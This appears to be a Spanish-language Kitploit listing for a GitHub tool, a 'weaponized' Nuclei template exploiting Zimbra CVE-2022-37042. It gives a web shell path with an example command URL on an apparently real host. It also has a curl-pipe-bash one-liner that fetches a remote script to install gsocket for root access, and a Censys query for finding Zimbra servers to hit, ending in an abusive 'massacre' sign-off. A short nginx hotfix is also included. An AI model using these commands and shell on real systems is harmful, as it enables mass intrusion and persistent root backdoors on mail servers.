Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-37042 — Plantilla armada de Nuclei para Zimbra CVE-2022-37042 | Kitploit
Herramientas/GitHubGitHub/aels/cve-2022-37042
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlDesarrollo de Payloads
GitHubaels/cve-2022-37042

CVE-2022-37042

Plantilla armada de Nuclei para Zimbra CVE-2022-37042

Ver Repositorio
1811hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-37042

imagen

Plantilla armada de Nuclei para Zimbra CVE-2022-37042

ruta del shell: /public/formatter.jsp

Nuclei en sí: https://github.com/projectdiscovery/nuclei

el shell tiene una entrada oculta con opacidad 0, así que simplemente pasa el ratón sobre ella, escribe el comando y pulsa la tecla [Enter]:

imagen

ejemplo de URL del shell:

root@kitploit:~
https://ms1.fission.com:8443/public/formatter.jsp?cmd=id

CVE-2022-37042 hotfix para parchear servidores comprometidos

ejecuta este comando (pero solo una vez):

root@kitploit:~
cd /opt/zimbra/conf/nginx/templates/; sed -i 's|location ~\* \^/zmerror_|location = /service/extension/backup/mboximport { return 403; }\n    location ~\* \^/zmerror_|' nginx.conf.web.http*; /opt/zimbra/bin/zmproxyctl restart;

se necesita código adicional para servidores que no usan Nginx sino Apache. Las pull requests son bienvenidas.

Zimbra autoroot vía zimbslap

root@kitploit:~
curl -fskSL raw.githubusercontent.com/aels/zimbra-slapper/main/slapper.sh | bash 2>&1

este comando instalará global-socket (https://www.gsocket.io/deploy/) y te pasará la clave para conectarte como root.

obtener IPs de zimbra

https://search.censys.io/search?resource=hosts&sort=RELEVANCE&per_page=100&virtual_hosts=EXCLUDE&q=services.http.response.html_tags%3A+%22%3Ctitle%3EZimbra+Web+Client+Sign+In%22

feliz masacre de cumpleaños, hijos de puta ;)

Descargar herramienta